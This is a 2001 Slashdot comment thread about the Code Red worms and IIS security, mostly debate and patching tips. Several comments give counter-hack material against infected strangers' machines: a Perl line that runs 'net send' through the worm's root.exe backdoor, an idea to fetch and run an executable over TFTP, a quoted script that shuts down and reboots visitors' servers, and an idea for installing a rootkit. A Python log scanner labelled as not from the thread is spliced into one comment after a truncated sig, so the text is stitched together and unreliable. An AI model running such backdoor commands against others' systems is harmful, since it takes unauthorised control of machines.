    I claim your posts contained much more, and largely uninformed or gratuitous, genuine bashing of free software than mine did of Microsoft.

    Disclaimer: my sister worked for Microsoft for many years. One of her positions included Lead Program Manager for Internet Explorer version 5. And I've been a longtime proprietary software (and technical-documentation) developer. I speak on these issues not so much to advocate one side or the other, but to rebut the misinformation that's widely circulated (by people such as yourself) regarding the respective software paradigms.

    And what, the original poster gets away with implying Microsoft is representative of the security-conscious?

    I don't know if he did that, but your response equated the single source of unexaminable, yet widely-deployed (on a hostile network, no less) software with one of the sources long known to be a poor choice, from a security perspective anyway, among many choices for software that does not come widely represented (and heavily marketed) as a "one-stop shop" for ordinary people to get on the Internet, run web servers without sysadmin experience, and yet be responsible net citizens, from security and other perspectives.

    Anyway, if your point is that people who say "Gee, if these folks would run free software, there wouldn't be so many security problems" have some serious flaws in their arguments, I agree wholeheartedly. But I don't say they're wrong, per se, just that statements like that often are oversimplified to the point of being, at least nearly, useless.

    (Fortunately, there isn't a $Billion advertising budget behind that message coming from free-software developers, so the importance of rebutting the arguments from that source seems, to me, to pale compared to that of rebutting the arguments coming from other, well-funded, sources.)

    Your lesson for today: learn there are other proprietary software vendors than Microsoft. I was only using MS because this thread is about their product specifically. The original poster implied that OS was inherently more secure than proprietary, and I still refuse to accept his or your reasoning.

    Your arrogance is really over the top. I, of course, have worked for many proprietary-software developers, none of them Microsoft, but can't help noticing which one has survived and flourished as what most people think of as the source of software enabling them to access the Internet.

    And while I agree that free software isn't, at the level of instantiation (that is, instances of free software), inherently more secure than proprietary, I do claim that it's inherently more secure as a model for software development and deployment.

    Further, my impression (definitely devoid of necessary research to support it) is that, in the free-software community, well-designed, secure software is a much better predictor of deployment, especially over the long term. Look at how "poorly" qmail is "marketed", yet its installed base is pretty amazing.

    After all, let's review another statement you made here:

    What I am defending is the numerous secure proprietary software out in the world.

    Name one. Name one that you can show is secure, in a public forum, by reviewing the most important material that should come into evidence: the source code!

    And that's the crux of the debate we're having. Ultimately, you believe that security through obscurity, in the form of not only obscuring algorithms, but obscuring the fact that proprietary-software developers have a form of relationship with their customer base that cannot, even under the best of circumstances, be described as "demonstrably committed to mutual security", is the best solution. (I use "committed" in the sense that "when it comes to ham and eggs for breakfast, the hen is involved, while the pig is committed". Proprietary-software developers do exist that provide some degree of commitment to the security of their customers' installations, but that commitment is, in my experience, "earned" via distinct payments and other consideration, compared to the software they sell. That is, the mere act of acquiring and deploying proprietary software rarely earns a customer any useful commitment from the vendor regarding security. The same goes for free software, in spades, of course, but with free software the customer has not only the original vendor to go to to purchase additional security commitments, but pretty much anyone else in the world, since he has access to the source code, to open forums for discussing its security, and to source-level patches to improve and/or test that security.)

    I believe that security, especially in the context we're discussing (security of systems on an open worldwide network like the Internet) is best, perhaps only, achievable through openness, in the form of open review, discussion, and testing of the models used to enforce it and the software that is written to support it.

    And with the model I choose, it doesn't matter nearly as much how "friendly" a software producer is with a given software consumer, since the latter can always review the source code himself (an option that, obviously, includes paying someone to do so).

    Note that I'm not representing myself as an expert on security. If you want to get an opinion from one, ask him this question:

    "All else being equal, would you rather choose, to secure an installation, a one-stop-shop-type monolithic solution from a single vendor, said solution's inner workings being kept secret from you and nearly everyone else, with your being legally and practically prevented from exploring its workings, perhaps even from seriously testing those workings? Or would you prefer to choose among a wide variety of openly developed, deployed, discussed, and tested components of an overall solution that you can either design yourself, hire someone to design, or some combination in between, where each component's inner workings are fully available to not only you, but others in your profession as well as the general public, and can, and have, been tested in open forums, with both successes and failures reported in said forums?"

    I'm purposely comparing the two extremes on the continuum between free and proprietary software (and it is a continuum), but the answers from most security experts will, I believe, point to the end of that continuum that most directly coincides with free software, and rarely coincides with any particular proprietary-software solution.

    Further, to the extent proprietary software tries to emulate particulars of free software in this continuum, to achieve more favorability, it becomes less proprietary. In particular, the financial advantages that accrue to the typical proprietary-software developer tend to diminish, in favor of advantages free-software developers already enjoy. At that point, as a customer, you're going to be paying the proprietary-software developer more to offset those losses (as calculated by the vendor) anyway, so you have even more funds to consider devoting to deploying free and open solutions instead.

    After all, it isn't the free-software development community that pushes for things like the DMCA, is it?

    --
    Practice random senselessness and act kind of beautiful.
  114. The real solution. by jcr · · Score: 2

    www.eros-os.org.

    When we can run the microsquish shit under emulation, on an OS that offers real security, then viruses, trojans, and worms become infeasible.

    On EROS, there's no reason for an app to have a write capability to its own code space: ergo, no worms.

    -jcr

    --
    The only title of honor that a tyrant can grant is "Enemy of the State."
  115. Your sig is hilarious. by Anonymous Coward · · Score: 0

    Hah!

    HTML guru, but when I go to your home page, I get a completely blank screen. Very funny.

    1. Re:Your sig is hilarious. by Anonymous Coward · · Score: 0

      So do I. He's one of those fucktards that makes the whole page out of JavaShit.

  116. Re:Not the mess they made... by DrSkwid · · Score: 1

    not really you see IIS runs as administrator and apache runs as nobody/www

    getting a root shell through apache is much harder than through iis, though I'll accept it's not a guarantee

    MS seem to code from the wrong side of the security fence from admin inwards instead of nobody outwards (if you see what I mean).

    plus the fabled tight integration of OS/Web Server/Other Apps increases the possible vectors.

    This was almost really a bug in Index Server not IIS.

    Having all your products from one vendor in a machine setup that is almost identical in every installation makes things easier.

    I run FreeBSD because I get some free security through obscurity. Ideally I'd run something like plan9 on my production boxes because then I'd get even more obscurity. Sadly migrating the php dross over to plan9 was too much to tackle to get it to production so I'm stuck with FreeBSD.

    If you choose MS products in your important environment then you really get what you deserve.

    And I used to be a pro NT guy but 2 years of adminning it on the internet running client websites taught me to say bye bye to Redmond and hello world.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  117. Re:Stop blaming microsoft by Tony-A · · Score: 1

    No, it's like you bought plexiglass and instead got that break-away stuff they use in the movies.

  118. Re:MS Tool by well_jung · · Score: 1

    The worm's memory-resident, moron. You have to reboot to get rid of it. No shit, Coward. It was a joke. Maybe the smiley face should have tipped you off.

    --
    Carl G. Jung
    --
    "With one breath, with one flow, You will know Synchronicity" -La Policia
  119. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0

    Please do..I'm getting tired of all the M$ apologists around here

  120. ummmm by Anonymous Coward · · Score: 0

    How come no one blames the assholes that wrote these worms to begin with?

    It's more fun to blame MS?

  121. The Real Fix by leonbrooks · · Score: 2
    The real fix is to disable the extension mappings for things like .ida/.idq and so on

    The real fix is to install some other web server. If it supports PHP you can also migrate your VB ASP scripts using ASP2PHP. But maybe you don't want to drag extinct-but-doesn't-know-it-yet methodology and technology across to your shiny new server?

    And... since you're changing such a major server component, why not change the whole server so that you're not, one day, forced to upgrade to Windows XP and bleed money for insecure software for the rest of your life? Install Service Pack MAXINT today!

    --
    Got time? Spend some of it coding or testing
  122. Re:Not the mess they made... by pointwood · · Score: 3, Offtopic

    Talking about rebooting - check this news.com video out.

    Everybody but Bill Gates thinks it's pretty funny :)

  123. No. by Tridus · · Score: 2

    This says nothing about the character of IIS Admins, it's about admins in general. And more importantly, people running this thing who don't even know that they have it running.

    Here is what they should have done to get this thing patched quickly.

    "Everybody running a version of Windows on their computer should go to http://windowsupdate.microsoft.com , and download all of the items in 'Critical Updates' (which has the security patches selected by default when you first load it anyway)."

    If you are vulnerable to Code Red and you're a home user, the patch appears in the list of updates and will be installed. If not, well no harm done.

    That's the whole point of Windows Update, if we could just get people to go to it even if they don't think they are open to Code Red, we could put a stop to this thing really fast.

    That's the problem here, not IIS. A bunch of clueless home users who don't know what's going on and have no reason to check because of the way it's being reported will not be the downfall of IIS. If Linux had any amount of home users to speak of, we'd see the same sort of problem among them eventually.

    --
    -- "So they told me that using the download page to download something was not something they anticipated." - Bill Gates
    1. Re:No. by mpe · · Score: 2

      "Everybody running a version of Windows on their computer should go to http://windowsupdate.microsoft.com , and download all of the items in 'Critical Updates' (which has the security patches selected by default when you first load it anyway)."

      Assuming Microsoft actually bother to put the right patches here. IIRC they didn't with the relevant IIS patch.

    2. Re:No. by rambot · · Score: 0, Flamebait

      are you going to criticize stupid shit, or are you going to talk about the issue at hand ya fuckin flame bait bitch.

    3. Re:No. by Anonymous Coward · · Score: 0

      AND! yes it does say something about the character of the IIS admins, because it takes very little technical know how to get a IIS server running. ("I had IIS running? I had no idea") Like I said! Uninformed, ignorant, or lazy! PICK ONE!

      Your posts do say something about your character too, for it doesn't take much knowledge to stuff four or five <P> tags in a sig or in the post itself!

      Pick one...

      While I'm at this, you should have said "decline in their numbers".

    4. Re:No. by rambot · · Score: 1

      Dumbass! No I wouldn't because it wouldn't be running as root!

  124. Use the tool, then format anyways? by moniker_21 · · Score: 2, Interesting

    So first Microsoft says this in the description of the tool:

    "Microsoft has developed a tool that eliminates the obvious damage that is caused by the Code Red II worm."

    Then they say this:

    "MICROSOFT RECOMMENDS THAT INFECTED INTERNET-FACING SERVERS BE REBUILT ACCORDING TO THE GUIDELINES PUBLISHED ON THE CERT WEB SITE."

    It should be noted that among other things in the CERT guidelines, they tell you to do a clean install of your OS after you've been compromised. So what's the point of this tool if MS thinks you should just R&R your OS anyways?

    --
    I posted to /. and all I got was this stupid sig
    1. Re:Use the tool, then format anyways? by stripes · · Score: 2
      So while not completely bullet-proof, the possibility is certainly there that one machine visible to the Internet got infected and spread the infection to other machines on the network which are not visible to the Internet.

      So that second machine is totally safe, as long as there is no security problem on the first machine that lets anyone in to it (root.exe anyone?)... in other words better reformat 'em both.

      The "hidden" machines may have a lower chance of having been altered, but since they are probably more important (otherwise why hide them?) that should make one want to be even more careful with them.

    2. Re:Use the tool, then format anyways? by ZxCv · · Score: 1

      You left out the part that said machines which are not visible to the Internet should just run this program and reboot. And machines which are visible to the Internet should do a complete rebuild.

      Many machines that are invisible to the Internet by way of a firewall are visible to other machines on the same network that are visible to the Internet.

      So while not completely bullet-proof, the possibility is certainly there that one machine visible to the Internet got infected and spread the infection to other machines on the network which are not visible to the Internet.

      Stupid guidelines if you ask me, but certainly not ambiguous to me.

      --

      Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  125. Re:Blame everyone bigger than you.! by Anonymous Coward · · Score: 0
    You claim, "it's not microsoft's fault if their userbase are composed of clueless morons...".

    But Microsoft has marketed their products at the clueless moron, right from the beginning. How then, can the userbase contain anything but a majority of morons? Microsoft products have always been thought of by typical users as "mass market" products. The fact that NT and Win 2K are aimed at business users is lost on most. It has never been emphasized by Microsoft that these products are too difficult for morons!

    It also goes without saying that any product marketed primarily to morons must be foolproof and robust to the most extreme extent possible. Does IIS qualify here? All the difficult bits should have warning messages at install time, similar to the warnings on cigarette packages, or the warnings on drug packages against dangerous interactions, knowing full well that products may be used by a moron.

    Are IIS or Win 2K products that, in their present state, should be marketed to morons? Will XP be even worse?

  126. Re:Stop blaming microsoft by DrSkwid · · Score: 1

    hmm

    manufacturer releases 4 sprays that have to be applied in the correct order and windows will only be bulletproof if no particular other sprays reached the window during the normal course of regular window spraying

    user then leaves the patio doors open anyway

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  127. Perl script to send message... by Kutsal · · Score: 1
    You can modify the Sam Philips' script so that it sends a message to the infected machine:

    use HTTP::Request;
    my $iis_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+net+send+*+\"You are INFECTED with the CODE RED WORM! Please FIX your IIS!\"");

    If you are running a TFTP server, Windows 2000 has a tftp client that you can use to download the CodeRedCleanup.exe and run it on the infected machine.

    With an exploit like this, the possibilities are endless......

    --
    Karma: Bad (but who really cares anyway?)
  128. Worse... by Julian+Morrison · · Score: 1

    A use that immediately strikes me: use RCII to install a rootkit, use the rootkit plus MS's deinstaller to hide the tracks of the initial RCII infection. Oops.

  129. Conspiracy Theory by hacker · · Score: 2, Interesting

    Has anyone begun to think that perhaps Microsoft themselves has planted CodeRed and variants out on the internet? Before you mod me down, read on:

    CodeRed, the first version was fairly lame, and didn't infect beyond a separate IP block. Microsoft gets scared and realizes that their "imminent" release of WinXP might be blocked, or worse yet, shunned by the consumers. "Oh no, now we can't track all those stolen copies of Windows".

    Then CodeRedII comes out, a bit nastier, going after more machines. Then Microsoft is denied their appeal.

    CodeRedIII comes out, infection is much worse, and now opens the machine up to more attacks than before. It gets so deep into your Windows system that you must reinstall anyway. Not only that, but allows anyone who reads their logs to go in and cause damage ("polluting blame" as we say). Now compromised machines are being hacked in many more ways than just being opened up.

    What does Microsoft recommend? You download this "patch" (audit tool) which you run and then it "cleans" (audits) your system, then as their own CERT document recommends, you reinstall your OS (i.e. find your original, licensed install media, and hit our website for the latest (intentionally trojaned) copies of drivers and IE/ActiveSetup installation tools).

    What's a bit odd about this process though, is that Microsoft requires that you run their "cleanup" tool to purge the infection, THEN reinstall. If I'm going to fdisk and reinstall anyway, why do I have to run this "cleanup" tool? (audit?)

    Curious that nobody has thought of this angle. Why do we not hear about hundreds of FBI agents tracking down the author of the virus in the Faroese Islands or whatever. Usually these people are caught within days of the outbreak. There hasn't been a single peep about any investigation in two full weeks. It's not like we don't have a HUGE audit trail, we all have dozens of logs. Plot it out, find the dates/times, narrow the search, and find them.

    Oh wait, perhaps they're the same entity which supplied you with the infectable OS in the first place.

    What was that they were saying about Linux being "potentially viral" a few weeks ago?

  130. Re:Here's how open source would be better... by cburley · · Score: 1
    What exactly does your (and other poster's) argument, or need, for a different vendor of the same product have to do with security?

    Excellent question. My best shot at an answer right now is that security (in the context of our discussion) is best achieved through a combination of factors, including robustness, clean, simple, unfettered design, solid engineering, and so on.

    Components that demonstrate the ability to be interchanged with and for other components, especially those from other vendors, especially in the presence of specifications and standards agreed upon by the industry as a whole, tend to better demonstrate those very qualities.

    I can also guarantee you a Linux system with FAT32 support. That does not make Linux a Windows machine, now does it?

    No, of course not. What it does illustrate is that FAT32 is not so inscrutable and poorly designed that alternative vendors can't support it, and that whatever security failings it might have (and I don't know much about that offhand) are more likely to be well known and well documented by the very fact that someone else, in this case multiple other "vendors", have employed it as an interoperable component.

    Where can you get the Linux kernel in FreeBSD? BeOS? NT? The kernel is not an interchangeable part like an engine can be.

    Sorry, you're very wrong about that. There's a reason some of us call the system "GNU/Linux" (other than the fact that some wish to associate with the popular name "Linux" the GNU name) -- because there is every possibility of creating an operating system based on the Linux kernel, but using utilities that are sufficiently compatible with, but not themselves, of GNU origin.

    Ditto for GNU/Hurd, a GNU system with Hurd as its kernel. A kernel that could be used as a component in a completely different system.

    Here's where you see the kinds of qualities expressed by a component that guide you towards an increased assurance regarding its security: since the Linux kernel is deployed on a huge number of devices in a form not consistent with the usual definition of "operating system" (say, in embedded devices), and since GNU utilities are widely deployed, or used to deploy, other systems that are neither GNU nor Linux, you have more assurances that both GNU and Linux are devoid of fundamentally unsound, undocumented security failings in design, and are less likely to have undiscovered bugs in their implementations, compared to proprietary-software components that don't interoperate as well.

    Nor is the kernel always an open design.

    What's your point? Linux, many *BSDs, Minix (?), and the Hurd are all examples of open-designed, maybe even free-software, kernels. And they enjoy a great deal of interoperability with each other, compared to almost any two proprietary kernels you can name (even two Microsoft ones, I'd guess, but certainly, say, WinNT's versus MacOS6's).

    But even non-open kernels, like Solaris (I assume) and HP-UX (I'm even more sure), gain some assurances by interoperating as well as they do with the GNU utilities, and vice versa. Ditto, but not as much, for Windows and GNU, since (I gather) the Windows ports for GNU utilities are, for such a successful system, rather hard to do and still (?) somewhat incomplete.

    The implications of the Windows/GNU combination include that if there are security mechanisms that are incorrectly placed in Windows, i.e. placed in a portion of userland that is replaced by a GNU utility when it should have been a kernel mechanism, that will be more quickly exposed and easily demonstrated via a combination Windows/GNU system. It might even be discovered by the authors of the Windows port for the replacement GNU utility -- a great example of a "white hat", one can reasonably assume, making an important discovery, one which Microsoft would, like as not, be unwilling to expose, even though "it" would certainly know about the failing.

    Further, while I've focused on the objective factors, or qualities, of deployed components, I suspect the real payoffs come during the period in which real people construct systems that use your components in ways you didn't plan, even when they toss out your component in place of another.

    At times like that, they're more apt to notice, and more willing to question, document, publish, things that might be failings in your design or implementation -- perhaps based on assumptions you made regarding the components with which your component would "always" be deployed.

    Further, the very act of focusing on designing and deploying an interchangeable component (much more like the Linux kernel, or the Apache web server, or qmail as well as its subcomponents) as versus a component that's intended only for use with a much larger monolith (much more like the Windows kernels, the IIS web server, or MS Exchange) causes the developers to think carefully about the exact sorts of interface and "border" issues that greatly affect real-world security. (Think about all those web-site security bugs that stemmed from the developers really believing the user's browser was actually a component in their web-site's monolithic "experience". The result? They'd shovel info to the browser for the user to interact with, then foolishly trust the (modified) information that came back, as if the user couldn't change it however they liked, even beyond what the web site's JavaScript (or whatever) was designed to allow.)

    After all, the small-component developer must think first about things like "how do other components like mine work? how is it made secure? what are the pitfalls?", while the monolith-component developer tends to think about things like "the monolith will provide security; the monolith will make everything work; we needn't look at pitfalls of other systems, since this is a new, wonderful system unique from all the rest".

    Which mind-set do you honestly think more describes that of the typical developer of widely deployed GNU/Linux software, and that of the typical developer of widely deployed Microsoft software?

    Having plenty of experience in and with both worlds, I know the answers in specific cases aren't always clear-cut, but, overall, it's the monolith-creating culture that is more willing to ignore history and reinvent the wheel. (There are those in the component-creating culture that do that, too, but they rarely succeed in making their component important in deployed software, because they can't force it to happen so easily.)

    --
    Practice random senselessness and act kind of beautiful.
  131. DSL Crashing by Anonymous Coward · · Score: 0

    If you have a Cisco 675 that is crashing, see

    http://www.incidents.org/archives/intrusions/msg01132.html

    Just doing set web disabled, is not enough!
    You must also do the additional steps listed in the above url.
    This solved all my cisco 675 router crashing problems!

  132. Re:FUD ALERT - and m$ bashers posting on /. !!? by dank113 · · Score: 1

    If you paid Microsoft bashers are going to post FUD like this please make it a little less obvious. Nobody needs to be paid to bash m$. They bash themselves plenty well. Any organization that believes bashing m$ is in their best interest knows this.

    --
    what if the hokey-pokey _is_ what it's all about?
  133. Re:Start blaming Microsoft again by reflective+recursion · · Score: 1

    Alrighty then! Lets blame Microsoft for the ignorant users of IIS. While we are at it why not blame Ford for the idiots who drive drunk? Sounds like an idear to me..

    --
    Dijkstra Considered Dead
  134. A better analogy: by Giant+Hairy+Spider · · Score: 1

    Blaming MS is like blaming the Death Star designer for the death of hundreds of thousands of loyal soldiers and the loss of untold billions of credits, when it was really the rebels who blew it up, regardless of any design flaws.

    The internet is a hostile network, anything that connects to it should be secure. There's plenty of blame to go around.

    --
    You'd be surprised at the broadband connection available to things crawling around in your hair.
  135. Re:Bad MS Downloads by Anonymous Coward · · Score: 0

    Run the patch at the command line with -L to make sure it is installed. the -L switch will list what hotfixes are installed.

  136. Re:CI Host sucks rocks by Dr.+Bombay · · Score: 1

    You might be interested in taking a look at what StellarHost has to offer
    http://www.stellarhost.com
    We have a rock solid network and great customer support.

  137. Re:Liability for software defects by nettdata · · Score: 1

    There's been talk on places like CNN and CNet about software makers being held liable for serious defects in much the same way Ford and Firestone are for their recent tire troubles.

    I think that would cause a bigger problem than it would solve. As soon as you start making the software developers liable for the problems with the software, then they will start restricting the use of that software in order to cover their asses.

    "What? You used that software for business purposes, on a machine with an Internet connection? Sorry, that breaks our terms of use... you're on your own."

    Also, I think comparing it to something like vehicle manufacturing is a little extreme. Let's face it, for the most part, I would venture that it is far easier to test a vehicle for defects than it is to test a piece of complex software. There are just way too many possible system configurations/setups/situations that could potentially cause problems in order to test them all. And when was the last time you had a fatal head-on collision because Code Red "blew up" your server?

    I think that the blame should be set square on the shoulders of the corporate decision makers and implementors who (a) choose to buy and use shitty software and (b) the implementors and administrators who don't know what the hell they are doing. Let's not even start talking about (for the most part, the lack of) proper Risk Management analysis in most corporations that use this software.

    Now, people are going to complain about the non-commercial, Individual users. Well, let them get hacked. Somebody somewhere will end up deleting everything off of their machine or reading their bank statements. If anything, that'll teach them a valuable lesson. "But they're flooding the Internet!" So what? They bought bandwidth from their provider, and they're using it (albeit not knowingly!). When their usage hits their limits, then it should be up to the ISP to make them pay more money, or take some action. "But they're attacking my site!" Are you yourself getting infected with the worm? Silly you. I've been getting around 5,000 - 10,000 hits a day to my server because of Code Red. Big deal. All they really represent are lines in my Apache log files.
    --
    $0.02 (CDN)
  138. Re:Wow, it really is stopping by Anonymous Coward · · Score: 0

    As of today 8-17-01 I am getting dinged in the double digits per hour still by CR infected systems.

  139. Has anyone tried running this under Windows? by Mustang+Matt · · Score: 2

    I haven't examined the script yet but Perl will run under windows. Not sure how you'd give it control of .ida though.

    --
    The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
    1. Re:Has anyone tried running this under Windows? by BigBlockMopar · · Score: 2

      A little off topic, how do you know if the infected computer is version 1 or 2?

      Follow the link in my .sig. NNNN = Code Red I. XXXX = Code Red II. Most of them now seem to be CR2 because it's a much more active hunter. When my log files rotate, you're gonna be out of luck until I get hit again. :)

      --
      Fire and Meat. Yummy.
  140. Re:Stop blaming microsoft by KilobyteKnight · · Score: 2

    When you buy a house, you know for a FACT that glass will break when hit with a hammer.

    The people who buy MS products THINK they're getting something secure, since it's one of the many buzzwords (READ: lies) that MS always uses.


    Many people look to buy a house in a "safe" neighborhood. Most people want cars with a good "safety rating". People install alarm systems in their homes and cars to make them "safer".

    You know what... none of that works either. Determined people will always find a way to break things. It doesn't matter if it is a house, a car, an alarm system, or an operating system.

    You simply shouldn't try to blame one entity for the malicious acts of another.

    --
    When will Windows be ready for the desktop?
  141. get the patch by bartyboy · · Score: 1
    seems to work fine for me. perhaps you should install the patch. Or maybe you were just joking and everything's fine: ---START PASTE---

    WELCOME NTK READERS!

    If you are reading this page, then you are probably curious...

    This page is actually a script that will connect to your machine and try to shut it down. Since you are seeing this you probably aren't a Code Red infected box.

    This will only work if you are infected with the "code red" virus which isn't really a virus but is a part of the Microsoft Internet Information Server (IIS).

    If you were a Code Red infected IIS then the command just sent to port 80 was to stop iis and to reboot your machine. If you aren't infected, then you have nothing to worry about, otherwise.. you should really use a secure webserver don't you think?.. one that doesn't let people in a gaping back door to do stuff like this...)

    This is how you can protect yourself and others, if you run perl, and a competent web server:

    1. Download this script.
    2. Rename it default.ida and place it in the DocumentRoot of your server
    3. Make sure the .ida extension is handled as a perl CGI script.
    If you can't figure out any of the above instructions then find someone who can.

    For historical purposes here's the old SSI version.

    ---END PASTE---
  142. FreeBSD security, HAH! by Anonymous Coward · · Score: 0

    Too bad hacking root on a FreeBSD box is easier than freezing water on the North Pole!

  143. Re:FUD ALERT by Longstaff · · Score: 2, Informative

    It seems to me that a GOOD ADMIN would have any important data backed up prior to installing/upgrading any mission critical servers. Just because you're a negligent moron doesn't mean that Windows sucks. You're correct that a "Good Admin" would back their data up before performing a system upgrade / patch.

    However, in this case, Windows DOES suck, regardless of the (moron|genius) at the keyboard.

    Any system that *requires* OS updates to be bundled and installed along with the application (IIS) updates is broken. It matters not if you have an intern "administering" the box or a 10-year-vet.

    If, for some reason, the latest bugfix from Apache broke compatibility with a current or previous Linux kernel, I can always pop a new kernel in there. On my own time. Checking to make sure that none of my other apps will break. Even if I'm not paying attention and blindly upgrade Apache without checking its deps, I'm left with an unusable Apache - my data is still there. I can just backpedal to my previous Apache and I'm up again.

    Not so with (2K|NT)/IIS. Install SP, hose machine...reinstall...

    One of these situations takes a little more time than the other...

  144. The patch from MS should.. by Anonymous Coward · · Score: 0

    start a network load of a *real* OS after reboot to ensure the problem doesn't return..

  145. Re:Stop blaming microsoft by TedCheshireAcad · · Score: 2, Funny

    Seriously, we don't need standard library routines. What use is printf() anyhow??

  146. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0

    this is the most well written, poignant comment I have read on this entire thread. You go girl!

  147. Re:About time! by SuiteSisterMary · · Score: 1, Flamebait

    Are you stupid? The first rule of system hardening is 'turn off services you don't need.' Pretty much every network operating system (except, I believe, certain variants of *BSD) tends to run daemons which generally aren't necessary. And I'll note that Bastille Linux turns off unneeded daemons as part of its hardening routine.

    --
    Vintage computer games and RPG books available. Email me if you're interested.
  148. The real issue is marrying OS and services by thejake316 · · Score: 1

    Every time I've shut down Apache for whatever reason or other I've never even had it cross my mind that I should reboot twice or even once to make sure no vestige of it remains. The *ix-ish model of services running in userspace as daemons makes much more sense than the NT-ish every service is either part of the OS or velcro'ed so tightly to it that you aren't sure where one ends and the other begins. I've seen many a Linux box where random stuff has crashed and the console is either dead or covered with error messages but those 10 httpd threads that were there at startup are still firing out web pages if you ask for 'em, and many an NT box where an error caused by IE or the mouse driver effectively takes the rest of the box with it. The standard spec for NT servers where I work appears to include watchdog cards, I think they're called Hangtime (cute name) cards, that're supposed to automatically reboot the server if something bad happens and can accept remote reboot requests even if the OS is hosed. I think they even work once in a while.

    --
    AC's cheerfully ignored
  149. Re:That script by Dahan · · Score: 1
    It's a pretty ineffectual script anyways even if it did work right, at least in terms of stopping CR. First it stops IIS, but it doesn't change the service settings to not make it start automatically on boot. Then it (tries to) reboot the machine. Well, if it was successful, IIS would start right back up again, vulnerable as ever. It'd be reinfected in a few minutes.

    Actually, it's probably better that it can't reboot--I think just stopping IIS will stop the machine from trying to infect other machines, so things would be okay until the next reboot.

  150. Re:Start blaming Microsoft again by Cyberfox · · Score: 1

    Extremely well put. Thank you for stating it so clearly, and with a minimum of bombast.

    Cyberfox!

  151. Red herring story by jariv · · Score: 1
  152. The Apache save isn't working and here's why... by gfecyk · · Score: 1

    64.221.96.210 - - [12/Aug/2001:00:07:49 -0500] "GET /default.ida?[snip query data] HTTP/1.0" 200 -

    That's a snip from my web server log. Granted I'm running Purveyor Webserver and I hacked it to replace .htp with .ida so it will do server side includes.

    It DOES launch the SSI scripts when visited with a regular web browser, but the web server never gets around to launching the scripts when Code Red visits it because it closes the connection before the web server can execute the scripts. This is evident after the "200 OK -" line where the "-" means no data was transferred.

    Apache might still process the page anyway and therefore launch the scripts, but aside from that I don't know how it gets as far as to run them.

    I'm thinking of running a background job to look at the log for /default.ida whenever the log file changes and then launch the scripts at anything that tried to view this page.

    --
    Use Evolution instead of Outlook? Bewa
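    As an added example, not code from the thread or from any of the scripts linked in it: a small Python log scanner that does the bookkeeping gfecyk's proposed background job would need, and applies the NNNN / XXXX rule BigBlockMopar gives above to tell Code Red I probes from Code Red II. It assumes Apache common-log lines (the format of the line quoted above) and counts the "200 -" case, where the worm dropped the connection before any body went out. The sample lines, IP addresses and timestamps are constructed, and the worm query strings are truncated to the first filler bytes plus the start of the %u-encoded payload.

```python
import re
from collections import Counter, defaultdict

# Apache common-log format, as in the line quoted in the thread:
# 64.221.96.210 - - [12/Aug/2001:00:07:49 -0500] "GET /default.ida?... HTTP/1.0" 200 -
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

IDA_PREFIX = '/default.ida?'


def classify(path):
    """Map a request path to a worm variant using the filler byte that
    starts the overlong query: 'N' for Code Red I, 'X' for Code Red II.
    Returns None for requests that are not .ida probes at all."""
    if not path.startswith(IDA_PREFIX):
        return None
    query = path[len(IDA_PREFIX):]
    if query.startswith('N'):
        return 'CodeRedI'
    if query.startswith('X'):
        return 'CodeRedII'
    return 'ida-other'  # some other .ida request: worth a look, but neither variant


def scan(lines):
    """Tally probing hosts per variant and flag lines the regex cannot parse.

    Returns (hits, aborted, unparsed):
      hits     - {variant: Counter(source ip -> probe count)}
      aborted  - probe lines logged with '-' as the byte count, i.e. the
                 client closed the connection before a response body was sent
      unparsed - raw lines that did not match the log format
    """
    hits = defaultdict(Counter)
    aborted = 0
    unparsed = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            unparsed.append(line)
            continue
        variant = classify(m.group('path'))
        if variant is None:
            continue
        hits[variant][m.group('ip')] += 1
        if m.group('bytes') == '-':
            aborted += 1
    return hits, aborted, unparsed


def report(lines):
    """Human-readable summary, one line per (variant, source ip), plus totals."""
    hits, aborted, unparsed = scan(lines)
    out = []
    for variant in sorted(hits):
        for ip, n in hits[variant].most_common():
            out.append(f'{variant:10} {ip:16} {n} probe(s)')
    out.append(f'{aborted} probe(s) closed before a response body was sent')
    out.append(f'{len(unparsed)} unparsed line(s)')
    return out


# Constructed sample log (not real traffic); the worm query strings are
# truncated to a few filler bytes plus the start of the %u-encoded payload.
SAMPLE_LOG = """\
64.221.96.210 - - [12/Aug/2001:00:07:49 -0500] "GET /default.ida?NNNNNNNNNNNNNNNN%u9090%u6858%ucbd3 HTTP/1.0" 404 295
10.0.0.7 - - [12/Aug/2001:00:09:02 -0500] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 200 -
10.0.0.7 - - [12/Aug/2001:00:11:15 -0500] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 200 -
192.0.2.44 - - [12/Aug/2001:00:12:40 -0500] "GET /index.html HTTP/1.1" 200 1532
this line is not in common log format
"""

if __name__ == '__main__':
    for line in report(SAMPLE_LOG.splitlines()):
        print(line)
```

    Feed it a real access_log with `report(open('access_log').readlines())`; the per-IP counters are what you would hand to a script that notifies or blocks a source, and the aborted count tells you whether your default.ida handler is ever actually getting to run against the worm's connections.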
  153. Re:Stop blaming microsoft by Anonymous Coward · · Score: 1, Informative

    idq.dll (the bad boy) is an ISAPI handler written in C

  154. And it keeps going by bonzoesc · · Score: 4, Informative

    I got this mail, and the problem is that people are WAY TOO STUPID to know what to do. If the microsoft patch can tell if it needs to do anything or not, RR and @home security should point everybody to it.

    From: security@cfl.rr.com
    To: Our Valued Customers
    Subject: Security Notification

    ROAD RUNNER ALERT

    VIRUS ALERT. YOUR IMMEDIATE ACTION IS REQUIRED.

    Dear Road Runner Subscriber:

    Road Runner, like many other ISPs and, indeed, the entire Internet, has
    experienced an attack on its network that apparently is attributable to a
    strain of the Code Red virus. It is possible that this virus has infected
